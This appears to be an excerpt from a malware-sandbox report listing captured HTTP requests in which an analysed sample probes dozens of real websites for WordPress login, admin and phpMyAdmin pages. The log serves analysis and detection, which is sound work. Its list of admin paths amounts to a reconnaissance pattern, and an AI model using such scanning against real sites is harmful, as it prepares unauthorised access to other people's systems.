Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=866846e4a95d698d2be97b497286681aad8ceca0-1703276099; __cf_bm=eY0D4_k8OQFfy9Ngj9OEED_OD7i433V95SWpFgrxatk-1703276099-1-Ad32xSe9y5tGH8uGN7JyLksEBAE/1nxR4yoWSeYxZ0LVDYUL568m6NQnzeumzLRGTwUx8RBLc0RdHXYTmnRpRTQ=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cannaclear.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wordpress/wp-login.php?redirect_to=https%3A%2F%2Fbldowney.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=dab9654e76fcb87f013f9734233b1b7aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://bldowney.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //PhpMyAdmin/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cannaclear.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=OzJqjiqHKt6aRbfNvBsKgVdCu_YtKZh4WwGGmG0c.Fk-1703276101-1-AUiI9rA1VB1zODFwTJl3fKqJYVylp2HfLPK9Tyeky1yQxNv2z5D8PKgtXuujpkunUZ5tbQx2WJDb4/+UW8Drc+4=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //phpMyAdmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //pma/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=Ij8.GzKOUCSeRteciNZvyEdv9xi61b5fGJ8KzBa4qEc-1703276106-1-AYm7nFYABeaygz+QR8NhbHojTjXUZpm+CbdCJfFcOg3A6iLH1+GSklXf0k+L9KNZVX3GH4SCprgzeGHLYiizQQg=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxJ\|ZYXxJUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcicfl.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
